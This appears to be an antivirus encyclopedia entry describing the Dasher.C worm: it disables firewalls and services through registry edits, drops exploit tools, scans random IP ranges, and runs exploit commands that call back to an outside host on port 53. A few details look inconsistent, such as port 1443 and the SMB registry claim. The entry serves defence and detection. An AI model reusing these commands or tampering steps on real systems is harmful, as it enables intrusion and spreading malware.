Worm:Win32/Dasher.C begins by terminating processes related to specific software firewalls, in addition to previously run instances of Worm:Win32/Dasher.C. These processes include:
Worm:Win32/Dasher.C then disables several Windows services by setting the registry value "Start" to 4 for the following registry keys:
- HKLM\SYSTEM\CurrentControlSet\Services\mousebm
- HKLM\SYSTEM\CurrentControlSet\Services\mousemm
- HKLM\SYSTEM\CurrentControlSet\Services\mousesync
- HKLM\SYSTEM\CurrentControlSet\Services\ssl
- HKLM\SYSTEM\CurrentControlSet\Services\wpa
- HKLM\SYSTEM\CurrentControlSet\Services\wupnp
- HKLM\SYSTEM\CurrentControlSet\Services\wudpcom
- HKLM\SYSTEM\CurrentControlSet\Services\MSDTC
- HKLM\SYSTEM\CurrentControlSet\Services\rpcsvc
It also sets the SMB service to start at boot-time by setting the registry value "SMBDeviceEnabled" to 0 in HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
After this, Worm:Win32/Dasher.C deletes the following files:
- <system dir>\wins\Sqltob.exe
- <system dir>\wins\SqlScan.exe
- <system dir>\wins\SqlExp.exe
- <system dir>\wins\SqlExp1.exe
- <system dir>\wins\SqlExp2.exe
- <system dir>\wins\SqlExp3.exe
and drops the following files:
- <system dir>\wins\Sqltob.exe (detected as Worm:Win32/Dasher.C)
- <system dir>\wins\SqlScan.exe (detected as Tool:Win32/Tcpportscan.C)
- <system dir>\wins\SqlExp.exe (detected as Exploit:Win32/MS04-045)
- <system dir>\wins\SqlExp1.exe (detected as Exploit:Win32/MS05-039)
- <system dir>\wins\SqlExp2.exe (detected as Exploit:Win32/MS05-051)
- <system dir>\wins\SqlExp3.exe (detected as Exploit:Win32/MS02-056)
It then deletes the registry value "Windows Update" under the key Software\Microsoft\Windows\CurrentVersion\Run
It then tries to execute <system dir>\wins\Sqltob.exe, and if successful, Worm:Win32/Dasher.C tries to delete itself.
Sqltob.exe performs the following actions in an infinite loop:
Deletes the following files:
- <system dir>\wins\Result.txt
- <system dir>\wins\42.txt
- <system dir>\wins\445.txt
- <system dir>\wins\1025.txt
- <system dir>\wins\1433.txt
Executes one of the following, randomly, to scan random IP addresses for computers listening on ports 42, 445, 1025, or 1433:
- <system dir>\wins\SqlScan.exe SYN <random>.0.0.1 <random>.10.255.255 42,445,1025,1433 /Save
- <system dir>\wins\SqlScan.exe SYN <random>.245.0.1 <random>.255.255.255 42,445,1025,1433 /Save
- <system dir>\wins\SqlScan.exe SYN <random>.<random>.0.1 <random>.<random>.255.255 42,445,1025,1433 /Save
Sqltob.exe then parses the scan results from SqlScan.exe and runs the following remote exploits to attempt to execute shellcode on remote vulnerable computers:
For IP addresses found listening on port 42, it executes
- SqlExp.exe -r 222.240.219.143 -p 53 -o 0 -t <target IP address>
For IP addresses found listening on port 445, it executes
- SqlExp1.exe <target IP address> 222.240.219.143 53 0
- SqlExp1.exe <target IP address> 222.240.219.143 53 1
For IP addresses found listening on port 1025, it executes
- SqlExp2.exe <target IP address> 1025 222.240.219.143 53 0
- SqlExp2.exe <target IP address> 1025 222.240.219.143 53 1
For IP addresses found listening on port 1443, it executes
- SqlExp3.exe <target IP address> 1433 222.240.219.143 53
